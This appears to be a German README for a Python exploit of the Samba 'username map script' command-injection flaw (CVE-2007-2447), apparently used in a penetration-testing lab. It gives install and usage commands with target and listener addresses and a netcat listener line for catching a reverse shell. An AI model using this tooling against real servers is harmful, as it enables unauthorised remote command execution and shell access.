
Python-Exploit für CVE-2007-2447, der die Schwachstelle im username map script von Samba ausnutzt und die Ausführung von Befehlen aus der Ferne über Shell-Metazeichen mit der Zustellung einer Reverse-Shell-Nutzlast ermöglicht.
"Die MS-RPC-Funktionalität in smbd in Samba 3.0.0 bis 3.0.25rc3 ermöglicht es entfernten Angreifern, beliebige Befehle über Shell-Metazeichen auszuführen, die die (1) SamrChangePassword-Funktion betreffen, wenn die "username map script"-Option in smb.conf aktiviert ist, und ermöglicht es entfernten authentifizierten Benutzern, Befehle über Shell-Metazeichen auszuführen, die andere MS-RPC-Funktionen in der (2) Remote-Drucker- und (3) Dateifreigabeverwaltung betreffen."
[*] Dieser Exploit erfordert Python 3.7 oder höher
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- Entferntes Host--lhost -- Lokaler Host--lport -- Lokaler Port--rport -- Entfernter Port [*] Optional. Standard=445Vergessen Sie nicht, Ihren Listener zu starten:
nc -lvnp 4444
